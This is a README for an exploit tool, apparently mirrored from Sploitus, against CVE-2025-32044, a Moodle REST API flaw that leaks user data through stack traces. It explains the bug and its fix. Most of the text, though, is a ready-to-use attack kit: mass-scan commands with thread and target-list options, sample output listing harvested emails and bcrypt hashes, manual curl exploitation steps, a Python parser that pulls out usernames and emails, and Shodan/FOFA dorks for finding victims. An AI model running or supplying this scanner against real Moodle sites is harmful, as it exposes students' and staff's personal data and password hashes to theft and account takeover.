Share
## https://sploitus.com/exploit?id=6E714490-1F2C-5856-95EC-9D69C555CBA4
CVE-2025-32044 โ Moodle Unauthenticated REST API User Data Exposure
Stack Trace Args Leak โ Names, Emails, Password Hashes
---
## Overview
**CVE-2025-32044** is a high-severity (CVSS 7.5) **unauthenticated** information disclosure vulnerability in **Moodle LMS 4.5.0 through 4.5.2**.
The vulnerability lies in Moodle's REST API exception handler โ `exception_response::get_payload_data()` in `lib/classes/router/response/exception_response.php`. Before the fix, PHP stack traces with **function arguments** were included in API error responses. These arguments contain sensitive user data passed through the call stack โ including usernames, full names, email addresses, and password hashes.
**No authentication, token, or user interaction is required** to trigger the leak. The attacker only needs to send a malformed request to any REST API endpoint that causes an internal exception.
### Affected Versions
| Moodle Version | Status |
|---|---|
| 4.5.0 โ 4.5.2 | Vulnerable |
| 4.5.3+ | Patched |
| **Discovered by:** Lucas Alonso (March 14, 2025)
> **Moodle Tracker:** MDL-84879
> **Advisory:** MSA-25-0011
---
## Vulnerability Mechanism
### Root Cause
```php
// lib/classes/router/response/exception_response.php (BEFORE fix)
protected static function get_payload_data(...): array {
$data = [
'message' => $exception->getMessage(),
'stacktrace' => $exception->getTrace(), // โ includes 'args'!
];
return $data;
}
```
When an exception occurs during REST API processing, the PHP stack trace includes the **function arguments** (`args`) for each frame in the call stack. These arguments inadvertently contain user table data that was being processed by functions higher in the call chain.
### The Fix (Moodle 4.5.3)
```php
// lib/classes/router/response/exception_response.php (AFTER fix)
'stacktrace' => array_map(
fn ($frame): array => array_filter(
$frame, fn ($key) => $key !== 'args', ARRAY_FILTER_USE_KEY
),
$exception->getTrace(),
),
```
Plus defense-in-depth in `lib/setup.php`:
```php
ini_set('zend.exception_ignore_args', '1');
```
### Attack Flow
```
1. Target Moodle 4.5.0-4.5.2 without zend.exception_ignore_args
2. Send malformed request to /webservice/rest/server.php
(e.g., core_user_get_users_by_field with missing required params)
3. Internal exception triggered during user data processing
4. API error response includes stack trace with 'args'
5. Parse args for usernames, emails, hashes
```
### What Data Is Leaked
| Field | Source |
|---|---|
| Username | `user` table |
| Full name | `firstname` + `lastname` |
| Email | `email` column |
| Password hash | bcrypt `$2y$` / `$2b$` hashes |
| Last login IP | `lastip` column |
| User ID | `id` column |
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2025-32044.git
cd CVE-2025-32044
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target scan
python cve_2025_32044.py -t moodle.target.com
# Mass scan
python cve_2025_32044.py -f moodle-targets.txt -o leaks.txt
# Mass scan with more threads
python cve_2025_32044.py -f moodle-targets.txt --threads 50 -o leaks.txt
# Debug mode
python cve_2025_32044.py -t moodle.target.com --debug -v
```
### Arguments
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save leaked user data to file
--threads Concurrent workers (default: 30)
--timeout Request timeout in seconds (default: 10)
--debug Show every HTTP request
-v, --verbose Verbose output
```
---
## Proof of Concept
### Single Target
```bash
$ python cve_2025_32044.py -t moodle-target.com
```
```
Moodle Stack Trace Leak | CVE-2025-32044 | CVSS 7.5
Host : moodle-target.com
Moodle : YES v4.5.1
WS Enabled : YES
Token : obtained (admin)
โโโ DATA LEAKED โโโ
admin | admin@university.ac.id
jsmith | john.smith@university.ac.id
mjones | mary.jones@university.ac.id
Emails: 3
Hashes: 3
$2y$10$abc123def456ghi789jkl012mno345pqr678stu901vwx234yz...
Time : 3.2s
```
### Mass Scan
```
Moodle Stack Trace Leak | CVE-2025-32044 | CVSS 7.5
Targets: 500 | Threads: 30 | Mode: QUIET
[LEAK] moodle-vuln-01.ac.id users=15 emails=12 hashes=15
[WS] moodle-patched-02.edu token=admin
[!] moodle-no-ws-03.org
[150/500] 30% | Det:87 WS:32 Tok:8 Leak:5
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Done | 320s | Targets:500 Moodle:87 WS:32 Token:8 Leaked:5
```
### Manual Exploitation
**Step 1 โ Detect Moodle + Web Services**
```bash
# Check if Moodle
curl -sk 'https://target.com/login/index.php' | grep -i moodle
# Check web services
curl -sk 'https://target.com/login/token.php?username=guest&password=guest&service=moodle_mobile_app'
# {"token":"abc..."} = WS enabled + maybe guest access
# {"error":"Web services must be enabled..."} = WS disabled
```
**Step 2 โ Get a token (if possible)**
```bash
curl -sk 'https://target.com/login/token.php?username=USER&password=PASS&service=moodle_mobile_app'
```
**Step 3 โ Trigger exception & capture leak**
```bash
curl -sk 'https://target.com/webservice/rest/server.php?wsfunction=core_user_get_users_by_field&moodlewsrestformat=json&field=id'
# Response will contain stacktrace with args if vulnerable
```
**Step 4 โ Parse leaked data**
```python
import json, requests
r = requests.get('https://target.com/webservice/rest/server.php', params={
'wsfunction': 'core_user_get_users_by_field',
'moodlewsrestformat': 'json',
'field': 'id'
})
data = r.json()
for frame in data.get('stacktrace', []):
for arg in frame.get('args', []):
if isinstance(arg, dict) and 'username' in arg:
print(f"User: {arg['username']} | {arg.get('email')} | {arg.get('fullname')}")
```
---
## Detection (Shodan / FOFA)
```
FOFA: body="moodle" && body="login/token.php"
Shodan: http.title:"Moodle" http.component:"Moodle"
Google: intitle:"Moodle" inurl:"login/token.php"
```
---
## Impact
Successful exploitation yields:
- **User enumeration** โ full list of Moodle users
- **Email addresses** โ phishing, credential stuffing
- **Password hashes** โ offline cracking โ account takeover
- **Last login IPs** โ user location tracking
- Chain: crack hash โ login โ escalate to admin โ template edit โ RCE
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| Moodle Advisory MSA-25-0011 | [moodle.org](https://moodle.org/mod/forum/discuss.php?d=467084) |
| Moodle Tracker MDL-84879 | [tracker.moodle.org](https://tracker.moodle.org/browse/MDL-84879) |
| Git Commit (fix) | [github.com/moodle/moodle/commit/41917db65e6b](https://github.com/moodle/moodle/commit/41917db65e6b3dba3bf3d805a8599e6752655646) |
| NVD Entry | [CVE-2025-32044](https://nvd.nist.gov/vuln/detail/CVE-2025-32044) |
| Discoverer | Lucas Alonso |
---
This project is not affiliated with Moodle Pty Ltd.